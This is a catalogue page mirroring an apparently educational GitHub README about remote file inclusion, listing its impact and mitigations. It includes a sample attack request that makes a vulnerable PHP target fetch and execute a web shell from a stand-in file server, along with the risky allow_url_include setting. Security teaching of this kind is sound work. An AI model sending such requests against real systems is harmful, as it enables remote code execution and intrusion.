https://github.com/qeeqbox/remote-file-inclusion

A threat actor may cause a vulnerable target to include/retrieve remote file
https://github.com/qeeqbox/remote-file-inclusion

file inclusion infosecsimplified qeeqbox remote vulnerability

Last synced: 5 months ago
JSON representation

A threat actor may cause a vulnerable target to include/retrieve remote file

Host: GitHub
URL: https://github.com/qeeqbox/remote-file-inclusion
Owner: qeeqbox
License: agpl-3.0
Created: 2023-06-22T08:07:11.000Z (about 3 years ago)
Default Branch: main
Last Pushed: 2024-01-29T00:56:48.000Z (over 2 years ago)
Last Synced: 2025-07-20T20:23:10.485Z (11 months ago)
Topics: file, inclusion, infosecsimplified, qeeqbox, remote, vulnerability
Homepage:
Size: 262 KB
Stars: 1
Watchers: 1
Forks: 0
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

README

A threat actor may cause a vulnerable target to include/retrieve remote file

## Example #1
1. A threat actor uploads a PHP web shell to a temporary file service
2. A threat actor sends a malicious request that includes the remote file name to a vulnerable target
3. The vulnerable target executes malicious files as PHP

## Code
#### Target-Logic
```php

#allow_url_include = On

```

#### Target-In
```
http://vulnerable.test/index.php?file=http://fileserver.test/shell.php
```

#### Target-Out
```
root
```

## Impact
High

## Names
- Remote file inclusion
- RFI

## Risk
- Read & Write data
- Command Execution

## Redemption
- Input validation
- Whitelist

## ID
cb60059e-846f-40df-9dbd-e687e8d6960a

## References
- [Wikipedia](https://en.wikipedia.org/wiki/file_inclusion_vulnerability)

ecosyste.ms

Data

Tools

Indexes

Applications

Experiments

Awesome

https://github.com/qeeqbox/remote-file-inclusion

Awesome Lists containing this project

README